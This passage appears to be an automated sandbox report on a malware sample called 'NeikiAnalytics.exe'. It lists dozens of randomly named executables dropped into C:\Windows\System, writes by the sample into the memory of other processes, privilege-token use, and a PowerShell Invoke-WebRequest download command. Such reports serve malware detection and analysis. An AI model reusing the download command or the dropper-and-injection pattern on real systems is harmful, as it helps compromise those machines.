File created C:\Windows\System\eFZFnTL.exe C:\Users\Admin\AppData\Local\Temp\3328c1064b090f7c9f24b2a6dc1f8290_NeikiAnalytics.exe N/A
File created C:\Windows\System\ulvTXbP.exe C:\Users\Admin\AppData\Local\Temp\3328c1064b090f7c9f24b2a6dc1f8290_NeikiAnalytics.exe N/A
File created C:\Windows\System\YpNEMGc.exe C:\Users\Admin\AppData\Local\Temp\3328c1064b090f7c9f24b2a6dc1f8290_NeikiAnalytics.exe N/A
File created C:\Windows\System\JkyTaXD.exe C:\Users\Admin\AppData\Local\Temp\3328c1064b090f7c9f24b2a6dc1f8290_NeikiAnalytics.exe N/A
File created C:\Windows\System\fykrlYv.exe C:\Users\Admin\AppData\Local\Temp\3328c1064b090f7c9f24b2a6dc1f8290_NeikiAnalytics.exe N/A
File created C:\Windows\System\JNpqjuG.exe C:\Users\Admin\AppData\Local\Temp\3328c1064b090f7c9f24b2a6dc1f8290_NeikiAnalytics.exe N/A
File created C:\Windows\System\FslsLln.exe C:\Users\Admin\AppData\Local\Temp\3328c1064b090f7c9f24b2a6dc1f8290_NeikiAnalytics.exe N/A
File created C:\Windows\System\ZkWoGsx.exe C:\Users\Admin\AppData\Local\Temp\3328c1064b090f7c9f24b2a6dc1f8290_NeikiAnalytics.exe N/A
File created C:\Windows\System\EobHzCN.exe C:\Users\Admin\AppData\Local\Temp\3328c1064b090f7c9f24b2a6dc1f8290_NeikiAnalytics.exe N/A
File created C:\Windows\System\vEjPkfv.exe C:\Users\Admin\AppData\Local\Temp\3328c1064b090f7c9f24b2a6dc1f8290_NeikiAnalytics.exe N/A
File created C:\Windows\System\bNkBmBX.exe C:\Users\Admin\AppData\Local\Temp\3328c1064b090f7c9f24b2a6dc1f8290_NeikiAnalytics.exe N/A
File created C:\Windows\System\GkDeRul.exe C:\Users\Admin\AppData\Local\Temp\3328c1064b090f7c9f24b2a6dc1f8290_NeikiAnalytics.exe N/A
File created C:\Windows\System\qFONnOp.exe C:\Users\Admin\AppData\Local\Temp\3328c1064b090f7c9f24b2a6dc1f8290_NeikiAnalytics.exe N/A
File created C:\Windows\System\zxFVPdE.exe C:\Users\Admin\AppData\Local\Temp\3328c1064b090f7c9f24b2a6dc1f8290_NeikiAnalytics.exe N/A
File created C:\Windows\System\TrzoRqb.exe C:\Users\Admin\AppData\Local\Temp\3328c1064b090f7c9f24b2a6dc1f8290_NeikiAnalytics.exe N/A
File created C:\Windows\System\cjPFidL.exe C:\Users\Admin\AppData\Local\Temp\3328c1064b090f7c9f24b2a6dc1f8290_NeikiAnalytics.exe N/A
File created C:\Windows\System\fLcihAL.exe C:\Users\Admin\AppData\Local\Temp\3328c1064b090f7c9f24b2a6dc1f8290_NeikiAnalytics.exe N/A
File created C:\Windows\System\eSJzzYi.exe C:\Users\Admin\AppData\Local\Temp\3328c1064b090f7c9f24b2a6dc1f8290_NeikiAnalytics.exe N/A
File created C:\Windows\System\KhlToUj.exe C:\Users\Admin\AppData\Local\Temp\3328c1064b090f7c9f24b2a6dc1f8290_NeikiAnalytics.exe N/A
File created C:\Windows\System\sZIhgeV.exe C:\Users\Admin\AppData\Local\Temp\3328c1064b090f7c9f24b2a6dc1f8290_NeikiAnalytics.exe N/A
File created C:\Windows\System\FhLVpnN.exe C:\Users\Admin\AppData\Local\Temp\3328c1064b090f7c9f24b2a6dc1f8290_NeikiAnalytics.exe N/A
File created C:\Windows\System\ngDtMLH.exe C:\Users\Admin\AppData\Local\Temp\3328c1064b090f7c9f24b2a6dc1f8290_NeikiAnalytics.exe N/A
File created C:\Windows\System\WFDNBfr.exe C:\Users\Admin\AppData\Local\Temp\3328c1064b090f7c9f24b2a6dc1f8290_NeikiAnalytics.exe N/A
File created C:\Windows\System\raOdWTw.exe C:\Users\Admin\AppData\Local\Temp\3328c1064b090f7c9f24b2a6dc1f8290_NeikiAnalytics.exe N/A
File created C:\Windows\System\nHAcIoP.exe C:\Users\Admin\AppData\Local\Temp\3328c1064b090f7c9f24b2a6dc1f8290_NeikiAnalytics.exe N/A
File created C:\Windows\System\sHxuHEV.exe C:\Users\Admin\AppData\Local\Temp\3328c1064b090f7c9f24b2a6dc1f8290_NeikiAnalytics.exe N/A
File created C:\Windows\System\cPQTuvm.exe C:\Users\Admin\AppData\Local\Temp\3328c1064b090f7c9f24b2a6dc1f8290_NeikiAnalytics.exe N/A
File created C:\Windows\System\OspeNeH.exe C:\Users\Admin\AppData\Local\Temp\3328c1064b090f7c9f24b2a6dc1f8290_NeikiAnalytics.exe N/A
File created C:\Windows\System\cMAPLYo.exe C:\Users\Admin\AppData\Local\Temp\3328c1064b090f7c9f24b2a6dc1f8290_NeikiAnalytics.exe N/A
File created C:\Windows\System\yUtAJMQ.exe C:\Users\Admin\AppData\Local\Temp\3328c1064b090f7c9f24b2a6dc1f8290_NeikiAnalytics.exe N/A
File created C:\Windows\System\rRlvKCG.exe C:\Users\Admin\AppData\Local\Temp\3328c1064b090f7c9f24b2a6dc1f8290_NeikiAnalytics.exe N/A
File created C:\Windows\System\sKUYspI.exe C:\Users\Admin\AppData\Local\Temp\3328c1064b090f7c9f24b2a6dc1f8290_NeikiAnalytics.exe N/A
File created C:\Windows\System\YIWRrdS.exe C:\Users\Admin\AppData\Local\Temp\3328c1064b090f7c9f24b2a6dc1f8290_NeikiAnalytics.exe N/A
File created C:\Windows\System\tonqUhD.exe C:\Users\Admin\AppData\Local\Temp\3328c1064b090f7c9f24b2a6dc1f8290_NeikiAnalytics.exe N/A
File created C:\Windows\System\KJyggco.exe C:\Users\Admin\AppData\Local\Temp\3328c1064b090f7c9f24b2a6dc1f8290_NeikiAnalytics.exe N/A
File created C:\Windows\System\XqvgNtk.exe C:\Users\Admin\AppData\Local\Temp\3328c1064b090f7c9f24b2a6dc1f8290_NeikiAnalytics.exe N/A
File created C:\Windows\System\sUfqvgC.exe C:\Users\Admin\AppData\Local\Temp\3328c1064b090f7c9f24b2a6dc1f8290_NeikiAnalytics.exe N/A
File created C:\Windows\System\ZdrEKAO.exe C:\Users\Admin\AppData\Local\Temp\3328c1064b090f7c9f24b2a6dc1f8290_NeikiAnalytics.exe N/A
File created C:\Windows\System\TKZaAEI.exe C:\Users\Admin\AppData\Local\Temp\3328c1064b090f7c9f24b2a6dc1f8290_NeikiAnalytics.exe N/A
File created C:\Windows\System\haLOwBH.exe C:\Users\Admin\AppData\Local\Temp\3328c1064b090f7c9f24b2a6dc1f8290_NeikiAnalytics.exe N/A
File created C:\Windows\System\pDUmbbw.exe C:\Users\Admin\AppData\Local\Temp\3328c1064b090f7c9f24b2a6dc1f8290_NeikiAnalytics.exe N/A
File created C:\Windows\System\KfeZRHf.exe C:\Users\Admin\AppData\Local\Temp\3328c1064b090f7c9f24b2a6dc1f8290_NeikiAnalytics.exe N/A
File created C:\Windows\System\MKetuYw.exe C:\Users\Admin\AppData\Local\Temp\3328c1064b090f7c9f24b2a6dc1f8290_NeikiAnalytics.exe N/A
File created C:\Windows\System\QUOwYJr.exe C:\Users\Admin\AppData\Local\Temp\3328c1064b090f7c9f24b2a6dc1f8290_NeikiAnalytics.exe N/A
File created C:\Windows\System\QpISRKx.exe C:\Users\Admin\AppData\Local\Temp\3328c1064b090f7c9f24b2a6dc1f8290_NeikiAnalytics.exe N/A
File created C:\Windows\System\hzWjpxs.exe C:\Users\Admin\AppData\Local\Temp\3328c1064b090f7c9f24b2a6dc1f8290_NeikiAnalytics.exe N/A
File created C:\Windows\System\nLKFNFi.exe C:\Users\Admin\AppData\Local\Temp\3328c1064b090f7c9f24b2a6dc1f8290_NeikiAnalytics.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\3328c1064b090f7c9f24b2a6dc1f8290_NeikiAnalytics.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\3328c1064b090f7c9f24b2a6dc1f8290_NeikiAnalytics.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 4788 wrote to memory of 2604 N/A C:\Users\Admin\AppData\Local\Temp\3328c1064b090f7c9f24b2a6dc1f8290_NeikiAnalytics.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4788 wrote to memory of 2604 N/A C:\Users\Admin\AppData\Local\Temp\3328c1064b090f7c9f24b2a6dc1f8290_NeikiAnalytics.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4788 wrote to memory of 2404 N/A C:\Users\Admin\AppData\Local\Temp\3328c1064b090f7c9f24b2a6dc1f8290_NeikiAnalytics.exe C:\Windows\System\GuQYdAi.exe
PID 4788 wrote to memory of 2404 N/A C:\Users\Admin\AppData\Local\Temp\3328c1064b090f7c9f24b2a6dc1f8290_NeikiAnalytics.exe C:\Windows\System\GuQYdAi.exe
PID 4788 wrote to memory of 100 N/A C:\Users\Admin\AppData\Local\Temp\3328c1064b090f7c9f24b2a6dc1f8290_NeikiAnalytics.exe C:\Windows\System\ibJwJkO.exe
PID 4788 wrote to memory of 100 N/A C:\Users\Admin\AppData\Local\Temp\3328c1064b090f7c9f24b2a6dc1f8290_NeikiAnalytics.exe C:\Windows\System\ibJwJkO.exe
PID 4788 wrote to memory of 3976 N/A C:\Users\Admin\AppData\Local\Temp\3328c1064b090f7c9f24b2a6dc1f8290_NeikiAnalytics.exe C:\Windows\System\XpOIqaF.exe
PID 4788 wrote to memory of 3976 N/A C:\Users\Admin\AppData\Local\Temp\3328c1064b090f7c9f24b2a6dc1f8290_NeikiAnalytics.exe C:\Windows\System\XpOIqaF.exe
PID 4788 wrote to memory of 3096 N/A C:\Users\Admin\AppData\Local\Temp\3328c1064b090f7c9f24b2a6dc1f8290_NeikiAnalytics.exe C:\Windows\System\ABISsQx.exe
PID 4788 wrote to memory of 3096 N/A C:\Users\Admin\AppData\Local\Temp\3328c1064b090f7c9f24b2a6dc1f8290_NeikiAnalytics.exe C:\Windows\System\ABISsQx.exe
PID 4788 wrote to memory of 1148 N/A C:\Users\Admin\AppData\Local\Temp\3328c1064b090f7c9f24b2a6dc1f8290_NeikiAnalytics.exe C:\Windows\System\lzjuSaZ.exe
PID 4788 wrote to memory of 1148 N/A C:\Users\Admin\AppData\Local\Temp\3328c1064b090f7c9f24b2a6dc1f8290_NeikiAnalytics.exe C:\Windows\System\lzjuSaZ.exe
PID 4788 wrote to memory of 3176 N/A C:\Users\Admin\AppData\Local\Temp\3328c1064b090f7c9f24b2a6dc1f8290_NeikiAnalytics.exe C:\Windows\System\LhPNcwc.exe
PID 4788 wrote to memory of 3176 N/A C:\Users\Admin\AppData\Local\Temp\3328c1064b090f7c9f24b2a6dc1f8290_NeikiAnalytics.exe C:\Windows\System\LhPNcwc.exe
PID 4788 wrote to memory of 1044 N/A C:\Users\Admin\AppData\Local\Temp\3328c1064b090f7c9f24b2a6dc1f8290_NeikiAnalytics.exe C:\Windows\System\OwxPNSm.exe
PID 4788 wrote to memory of 1044 N/A C:\Users\Admin\AppData\Local\Temp\3328c1064b090f7c9f24b2a6dc1f8290_NeikiAnalytics.exe C:\Windows\System\OwxPNSm.exe
PID 4788 wrote to memory of 924 N/A C:\Users\Admin\AppData\Local\Temp\3328c1064b090f7c9f24b2a6dc1f8290_NeikiAnalytics.exe C:\Windows\System\VtUfpKp.exe
PID 4788 wrote to memory of 924 N/A C:\Users\Admin\AppData\Local\Temp\3328c1064b090f7c9f24b2a6dc1f8290_NeikiAnalytics.exe C:\Windows\System\VtUfpKp.exe
PID 4788 wrote to memory of 812 N/A C:\Users\Admin\AppData\Local\Temp\3328c1064b090f7c9f24b2a6dc1f8290_NeikiAnalytics.exe C:\Windows\System\UMxQyFW.exe
PID 4788 wrote to memory of 812 N/A C:\Users\Admin\AppData\Local\Temp\3328c1064b090f7c9f24b2a6dc1f8290_NeikiAnalytics.exe C:\Windows\System\UMxQyFW.exe
PID 4788 wrote to memory of 1068 N/A C:\Users\Admin\AppData\Local\Temp\3328c1064b090f7c9f24b2a6dc1f8290_NeikiAnalytics.exe C:\Windows\System\brfPXjn.exe
PID 4788 wrote to memory of 1068 N/A C:\Users\Admin\AppData\Local\Temp\3328c1064b090f7c9f24b2a6dc1f8290_NeikiAnalytics.exe C:\Windows\System\brfPXjn.exe
PID 4788 wrote to memory of 2944 N/A C:\Users\Admin\AppData\Local\Temp\3328c1064b090f7c9f24b2a6dc1f8290_NeikiAnalytics.exe C:\Windows\System\FiUftQL.exe
PID 4788 wrote to memory of 2944 N/A C:\Users\Admin\AppData\Local\Temp\3328c1064b090f7c9f24b2a6dc1f8290_NeikiAnalytics.exe C:\Windows\System\FiUftQL.exe
PID 4788 wrote to memory of 2432 N/A C:\Users\Admin\AppData\Local\Temp\3328c1064b090f7c9f24b2a6dc1f8290_NeikiAnalytics.exe C:\Windows\System\yYgbnon.exe
PID 4788 wrote to memory of 2432 N/A C:\Users\Admin\AppData\Local\Temp\3328c1064b090f7c9f24b2a6dc1f8290_NeikiAnalytics.exe C:\Windows\System\yYgbnon.exe
PID 4788 wrote to memory of 4928 N/A C:\Users\Admin\AppData\Local\Temp\3328c1064b090f7c9f24b2a6dc1f8290_NeikiAnalytics.exe C:\Windows\System\RPjlMqe.exe
PID 4788 wrote to memory of 4928 N/A C:\Users\Admin\AppData\Local\Temp\3328c1064b090f7c9f24b2a6dc1f8290_NeikiAnalytics.exe C:\Windows\System\RPjlMqe.exe
PID 4788 wrote to memory of 5088 N/A C:\Users\Admin\AppData\Local\Temp\3328c1064b090f7c9f24b2a6dc1f8290_NeikiAnalytics.exe C:\Windows\System\qMTBAsP.exe
PID 4788 wrote to memory of 5088 N/A C:\Users\Admin\AppData\Local\Temp\3328c1064b090f7c9f24b2a6dc1f8290_NeikiAnalytics.exe C:\Windows\System\qMTBAsP.exe
PID 4788 wrote to memory of 3672 N/A C:\Users\Admin\AppData\Local\Temp\3328c1064b090f7c9f24b2a6dc1f8290_NeikiAnalytics.exe C:\Windows\System\iIdMqQG.exe
PID 4788 wrote to memory of 3672 N/A C:\Users\Admin\AppData\Local\Temp\3328c1064b090f7c9f24b2a6dc1f8290_NeikiAnalytics.exe C:\Windows\System\iIdMqQG.exe
PID 4788 wrote to memory of 2136 N/A C:\Users\Admin\AppData\Local\Temp\3328c1064b090f7c9f24b2a6dc1f8290_NeikiAnalytics.exe C:\Windows\System\lUZwSgU.exe
PID 4788 wrote to memory of 2136 N/A C:\Users\Admin\AppData\Local\Temp\3328c1064b090f7c9f24b2a6dc1f8290_NeikiAnalytics.exe C:\Windows\System\lUZwSgU.exe
PID 4788 wrote to memory of 2116 N/A C:\Users\Admin\AppData\Local\Temp\3328c1064b090f7c9f24b2a6dc1f8290_NeikiAnalytics.exe C:\Windows\System\ewqbMtT.exe
PID 4788 wrote to memory of 2116 N/A C:\Users\Admin\AppData\Local\Temp\3328c1064b090f7c9f24b2a6dc1f8290_NeikiAnalytics.exe C:\Windows\System\ewqbMtT.exe
PID 4788 wrote to memory of 2192 N/A C:\Users\Admin\AppData\Local\Temp\3328c1064b090f7c9f24b2a6dc1f8290_NeikiAnalytics.exe C:\Windows\System\uPckzTH.exe
PID 4788 wrote to memory of 2192 N/A C:\Users\Admin\AppData\Local\Temp\3328c1064b090f7c9f24b2a6dc1f8290_NeikiAnalytics.exe C:\Windows\System\uPckzTH.exe
PID 4788 wrote to memory of 3488 N/A C:\Users\Admin\AppData\Local\Temp\3328c1064b090f7c9f24b2a6dc1f8290_NeikiAnalytics.exe C:\Windows\System\cDhwHWH.exe
PID 4788 wrote to memory of 3488 N/A C:\Users\Admin\AppData\Local\Temp\3328c1064b090f7c9f24b2a6dc1f8290_NeikiAnalytics.exe C:\Windows\System\cDhwHWH.exe
PID 4788 wrote to memory of 792 N/A C:\Users\Admin\AppData\Local\Temp\3328c1064b090f7c9f24b2a6dc1f8290_NeikiAnalytics.exe C:\Windows\System\FVvaqxz.exe
PID 4788 wrote to memory of 792 N/A C:\Users\Admin\AppData\Local\Temp\3328c1064b090f7c9f24b2a6dc1f8290_NeikiAnalytics.exe C:\Windows\System\FVvaqxz.exe
PID 4788 wrote to memory of 4648 N/A C:\Users\Admin\AppData\Local\Temp\3328c1064b090f7c9f24b2a6dc1f8290_NeikiAnalytics.exe C:\Windows\System\SCCvpyQ.exe
PID 4788 wrote to memory of 4648 N/A C:\Users\Admin\AppData\Local\Temp\3328c1064b090f7c9f24b2a6dc1f8290_NeikiAnalytics.exe C:\Windows\System\SCCvpyQ.exe
PID 4788 wrote to memory of 712 N/A C:\Users\Admin\AppData\Local\Temp\3328c1064b090f7c9f24b2a6dc1f8290_NeikiAnalytics.exe C:\Windows\System\xyHcubE.exe
PID 4788 wrote to memory of 712 N/A C:\Users\Admin\AppData\Local\Temp\3328c1064b090f7c9f24b2a6dc1f8290_NeikiAnalytics.exe C:\Windows\System\xyHcubE.exe
PID 4788 wrote to memory of 4052 N/A C:\Users\Admin\AppData\Local\Temp\3328c1064b090f7c9f24b2a6dc1f8290_NeikiAnalytics.exe C:\Windows\System\OAiCHue.exe
PID 4788 wrote to memory of 4052 N/A C:\Users\Admin\AppData\Local\Temp\3328c1064b090f7c9f24b2a6dc1f8290_NeikiAnalytics.exe C:\Windows\System\OAiCHue.exe
PID 4788 wrote to memory of 1448 N/A C:\Users\Admin\AppData\Local\Temp\3328c1064b090f7c9f24b2a6dc1f8290_NeikiAnalytics.exe C:\Windows\System\ihkzmUl.exe
PID 4788 wrote to memory of 1448 N/A C:\Users\Admin\AppData\Local\Temp\3328c1064b090f7c9f24b2a6dc1f8290_NeikiAnalytics.exe C:\Windows\System\ihkzmUl.exe
PID 4788 wrote to memory of 1256 N/A C:\Users\Admin\AppData\Local\Temp\3328c1064b090f7c9f24b2a6dc1f8290_NeikiAnalytics.exe C:\Windows\System\QosOhYI.exe
PID 4788 wrote to memory of 1256 N/A C:\Users\Admin\AppData\Local\Temp\3328c1064b090f7c9f24b2a6dc1f8290_NeikiAnalytics.exe C:\Windows\System\QosOhYI.exe
PID 4788 wrote to memory of 2712 N/A C:\Users\Admin\AppData\Local\Temp\3328c1064b090f7c9f24b2a6dc1f8290_NeikiAnalytics.exe C:\Windows\System\WZKnJMo.exe
PID 4788 wrote to memory of 2712 N/A C:\Users\Admin\AppData\Local\Temp\3328c1064b090f7c9f24b2a6dc1f8290_NeikiAnalytics.exe C:\Windows\System\WZKnJMo.exe
PID 4788 wrote to memory of 4060 N/A C:\Users\Admin\AppData\Local\Temp\3328c1064b090f7c9f24b2a6dc1f8290_NeikiAnalytics.exe C:\Windows\System\BsDjvmz.exe
PID 4788 wrote to memory of 4060 N/A C:\Users\Admin\AppData\Local\Temp\3328c1064b090f7c9f24b2a6dc1f8290_NeikiAnalytics.exe C:\Windows\System\BsDjvmz.exe
PID 4788 wrote to memory of 1976 N/A C:\Users\Admin\AppData\Local\Temp\3328c1064b090f7c9f24b2a6dc1f8290_NeikiAnalytics.exe C:\Windows\System\pIqAcxI.exe
PID 4788 wrote to memory of 1976 N/A C:\Users\Admin\AppData\Local\Temp\3328c1064b090f7c9f24b2a6dc1f8290_NeikiAnalytics.exe C:\Windows\System\pIqAcxI.exe
PID 4788 wrote to memory of 2368 N/A C:\Users\Admin\AppData\Local\Temp\3328c1064b090f7c9f24b2a6dc1f8290_NeikiAnalytics.exe C:\Windows\System\zPpOCVO.exe
PID 4788 wrote to memory of 2368 N/A C:\Users\Admin\AppData\Local\Temp\3328c1064b090f7c9f24b2a6dc1f8290_NeikiAnalytics.exe C:\Windows\System\zPpOCVO.exe
PID 4788 wrote to memory of 4984 N/A C:\Users\Admin\AppData\Local\Temp\3328c1064b090f7c9f24b2a6dc1f8290_NeikiAnalytics.exe C:\Windows\System\vhHmvFP.exe
PID 4788 wrote to memory of 4984 N/A C:\Users\Admin\AppData\Local\Temp\3328c1064b090f7c9f24b2a6dc1f8290_NeikiAnalytics.exe C:\Windows\System\vhHmvFP.exe
PID 4788 wrote to memory of 4820 N/A C:\Users\Admin\AppData\Local\Temp\3328c1064b090f7c9f24b2a6dc1f8290_NeikiAnalytics.exe C:\Windows\System\RXMZPuQ.exe
PID 4788 wrote to memory of 4820 N/A C:\Users\Admin\AppData\Local\Temp\3328c1064b090f7c9f24b2a6dc1f8290_NeikiAnalytics.exe C:\Windows\System\RXMZPuQ.exe

Processes

C:\Users\Admin\AppData\Local\Temp\3328c1064b090f7c9f24b2a6dc1f8290_NeikiAnalytics.exe

"C:\Users\Admin\AppData\Local\Temp\3328c1064b090f7c9f24b2a6dc1f8290_NeikiAnalytics.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -command "Invoke-WebRequest "https://raw.githubusercontent.com/" "

C:\Windows\System\GuQYdAi.exe

C:\Windows\System\GuQYdAi.exe

C:\Windows\System\ibJwJkO.exe

C:\Windows\System\ibJwJkO.exe

C:\Windows\System\XpOIqaF.exe

C:\Windows\System\XpOIqaF.exe

C:\Windows\System\ABISsQx.exe

C:\Windows\System\ABISsQx.exe

C:\Windows\System\lzjuSaZ.exe

C:\Windows\System\lzjuSaZ.exe

C:\Windows\System\LhPNcwc.exe

C:\Windows\System\LhPNcwc.exe

C:\Windows\System\OwxPNSm.exe

C:\Windows\System\OwxPNSm.exe

C:\Windows\System\VtUfpKp.exe

C:\Windows\System\VtUfpKp.exe

C:\Windows\System\UMxQyFW.exe

C:\Windows\System\UMxQyFW.exe

C:\Windows\System\brfPXjn.exe

C:\Windows\System\brfPXjn.exe

C:\Windows\System\FiUftQL.exe

C:\Windows\System\FiUftQL.exe

C:\Windows\System\yYgbnon.exe

C:\Windows\System\yYgbnon.exe

C:\Windows\System\RPjlMqe.exe

C:\Windows\System\RPjlMqe.exe

C:\Windows\System\qMTBAsP.exe

C:\Windows\System\qMTBAsP.exe

C:\Windows\System\iIdMqQG.exe

C:\Windows\System\iIdMqQG.exe

C:\Windows\System\lUZwSgU.exe

C:\Windows\System\lUZwSgU.exe

C:\Windows\System\ewqbMtT.exe

C:\Windows\System\ewqbMtT.exe

C:\Windows\System\uPckzTH.exe

C:\Windows\System\uPckzTH.exe

C:\Windows\System\cDhwHWH.exe

C:\Windows\System\cDhwHWH.exe

C:\Windows\System\FVvaqxz.exe

C:\Windows\System\FVvaqxz.exe

C:\Windows\System\SCCvpyQ.exe

C:\Windows\System\SCCvpyQ.exe

C:\Windows\System\xyHcubE.exe

C:\Windows\System\xyHcubE.exe

C:\Windows\System\OAiCHue.exe

C:\Windows\System\OAiCHue.exe

C:\Windows\System\ihkzmUl.exe

C:\Windows\System\ihkzmUl.exe

C:\Windows\System\QosOhYI.exe

C:\Windows\System\QosOhYI.exe

C:\Windows\System\WZKnJMo.exe

C:\Windows\System\WZKnJMo.exe

C:\Windows\System\BsDjvmz.exe

C:\Windows\System\BsDjvmz.exe

C:\Windows\System\pIqAcxI.exe

C:\Windows\System\pIqAcxI.exe

C:\Windows\System\zPpOCVO.exe

C:\Windows\System\zPpOCVO.exe

C:\Windows\System\vhHmvFP.exe

C:\Windows\System\vhHmvFP.exe

C:\Windows\System\RXMZPuQ.exe

C:\Windows\System\RXMZPuQ.exe

C:\Windows\System\MllIDLP.exe

C:\Windows\System\MllIDLP.exe

C:\Windows\System\kWYQufV.exe

C:\Windows\System\kWYQufV.exe

C:\Windows\System\cPQTuvm.exe

C:\Windows\System\cPQTuvm.exe

C:\Windows\System\XLUuMDH.exe

C:\Windows\System\XLUuMDH.exe

C:\Windows\System\IFBTFEo.exe

C:\Windows\System\IFBTFEo.exe

C:\Windows\System\lWLhAxV.exe

C:\Windows\System\lWLhAxV.exe

C:\Windows\System\FripFsA.exe

C:\Windows\System\FripFsA.exe

C:\Windows\System\bZItqNc.exe

C:\Windows\System\bZItqNc.exe

C:\Windows\System\sDYEvQZ.exe

C:\Windows\System\sDYEvQZ.exe

C:\Windows\System\rkYnWSY.exe

C:\Windows\System\rkYnWSY.exe

C:\Windows\System\QBMDXYP.exe

C:\Windows\System\QBMDXYP.exe

C:\Windows\System\UvGZeAa.exe

C:\Windows\System\UvGZeAa.exe

C:\Windows\System\vBKLgfl.exe

C:\Windows\System\vBKLgfl.exe

C:\Windows\System\xHsbmJX.exe

C:\Windows\System\xHsbmJX.exe

C:\Windows\System\XyuvFJa.exe

C:\Windows\System\XyuvFJa.exe

C:\Windows\System\xKRLEgo.exe

C:\Windows\System\xKRLEgo.exe

C:\Windows\System\Nfqlota.exe

C:\Windows\System\Nfqlota.exe

C:\Windows\System\LdbzhIq.exe

C:\Windows\System\LdbzhIq.exe

C:\Windows\System\UTisUqk.exe

C:\Windows\System\UTisUqk.exe

C:\Windows\System\NeMwWTX.exe

C:\Windows\System\NeMwWTX.exe

C:\Windows\System\SbXdABZ.exe

C:\Windows\System\SbXdABZ.exe

C:\Windows\System\EZcUlkX.exe

C:\Windows\System\EZcUlkX.exe

C:\Windows\System\XurQWzv.exe

C:\Windows\System\XurQWzv.exe

C:\Windows\System\pSlVyGy.exe

C:\Windows\System\pSlVyGy.exe

C:\Windows\System\RAUxcdL.exe

C:\Windows\System\RAUxcdL.exe

C:\Windows\System\jUEclnp.exe

C:\Windows\System\jUEclnp.exe

C:\Windows\System\IdsLujJ.exe

C:\Windows\System\IdsLujJ.exe

C:\Windows\System\YXplQkM.exe

C:\Windows\System\YXplQkM.exe

C:\Windows\System\OYKyNqG.exe

C:\Windows\System\OYKyNqG.exe

C:\Windows\System\bPKmwDh.exe

C:\Windows\System\bPKmwDh.exe

C:\Windows\System\qFONnOp.exe

C:\Windows\System\qFONnOp.exe

C:\Windows\System\dTiQBeO.exe

C:\Windows\System\dTiQBeO.exe

C:\Windows\System\pDUmbbw.exe

C:\Windows\System\pDUmbbw.exe

C:\Windows\System\RZXZPvM.exe

C:\Windows\System\RZXZPvM.exe

C:\Windows\System\ngDtMLH.exe

C:\Windows\System\ngDtMLH.exe

C:\Windows\System\wvSPDUZ.exe

C:\Windows\System\wvSPDUZ.exe

C:\Windows\System\ETyiYZi.exe

C:\Windows\System\ETyiYZi.exe

C:\Windows\System\SunQfmU.exe

C:\Windows\System\SunQfmU.exe

C:\Windows\System\wVoWaBT.exe

C:\Windows\System\wVoWaBT.exe

C:\Windows\System\XDCLbhB.exe

C:\Windows\System\XDCLbhB.exe

C:\Windows\System\GBDNVob.exe

C:\Windows\System\GBDNVob.exe

C:\Windows\System\rAPkoVS.exe

C:\Windows\System\rAPkoVS.exe

C:\Windows\System\npXweOr.exe

C:\Windows\System\npXweOr.exe

C:\Windows\System\XsnlPyA.exe

C:\Windows\System\XsnlPyA.exe

C:\Windows\System\gYbCMdq.exe

C:\Windows\System\gYbCMdq.exe

C:\Windows\System\SdOpBxR.exe

C:\Windows\System\SdOpBxR.exe

C:\Windows\System\NRyHdoz.exe

C:\Windows\System\NRyHdoz.exe

C:\Windows\System\bSPlVnp.exe

C:\Windows\System\bSPlVnp.exe

C:\Windows\System\GflLBjV.exe

C:\Windows\System\GflLBjV.exe

C:\Windows\System\yadTMWb.exe

C:\Windows\System\yadTMWb.exe

C:\Windows\System\MqLeMbB.exe

C:\Windows\System\MqLeMbB.exe

C:\Windows\System\pldWEXK.exe

C:\Windows\System\pldWEXK.exe

C:\Windows\System\dZsbOpm.exe

C:\Windows\System\dZsbOpm.exe

C:\Windows\System\jXjJLSA.exe

C:\Windows\System\jXjJLSA.exe

C:\Windows\System\wiBvCeM.exe

C:\Windows\System\wiBvCeM.exe

C:\Windows\System\ZkdNXVM.exe

C:\Windows\System\ZkdNXVM.exe

C:\Windows\System\lwEugeg.exe

C:\Windows\System\lwEugeg.exe

C:\Windows\System\FhLVpnN.exe

C:\Windows\System\FhLVpnN.exe

C:\Windows\System\FSYOvIT.exe

C:\Windows\System\FSYOvIT.exe

C:\Windows\System\qtFXAyH.exe

C:\Windows\System\qtFXAyH.exe

C:\Windows\System\FgGKwly.exe

C:\Windows\System\FgGKwly.exe

C:\Windows\System\aAtDNkP.exe

C:\Windows\System\aAtDNkP.exe

C:\Windows\System\FrAoXhF.exe

C:\Windows\System\FrAoXhF.exe

C:\Windows\System\NaMowfA.exe

C:\Windows\System\NaMowfA.exe

C:\Windows\System\ddJnYqI.exe

C:\Windows\System\ddJnYqI.exe

C:\Windows\System\oydIOUc.exe

C:\Windows\System\oydIOUc.exe

C:\Windows\System\LyGXQSg.exe

C:\Windows\System\LyGXQSg.exe

C:\Windows\System\JUxMHAo.exe

C:\Windows\System\JUxMHAo.exe

C:\Windows\System\FxPaDnQ.exe

C:\Windows\System\FxPaDnQ.exe

C:\Windows\System\OuKJFKr.exe

C:\Windows\System\OuKJFKr.exe

C:\Windows\System\bZiotjn.exe

C:\Windows\System\bZiotjn.exe

C:\Windows\System\eHvljeu.exe

C:\Windows\System\eHvljeu.exe

C:\Windows\System\vLIhRVX.exe

C:\Windows\System\vLIhRVX.exe

C:\Windows\System\QMLfIWe.exe

C:\Windows\System\QMLfIWe.exe

C:\Windows\System\YIWRrdS.exe

C:\Windows\System\YIWRrdS.exe

C:\Windows\System\CWbdhTa.exe

C:\Windows\System\CWbdhTa.exe

C:\Windows\System\DEKSBkG.exe

C:\Windows\System\DEKSBkG.exe

C:\Windows\System\EFrTVAQ.exe

C:\Windows\System\EFrTVAQ.exe

C:\Windows\System\tviGeCo.exe

C:\Windows\System\tviGeCo.exe

C:\Windows\System\MHTGpxn.exe

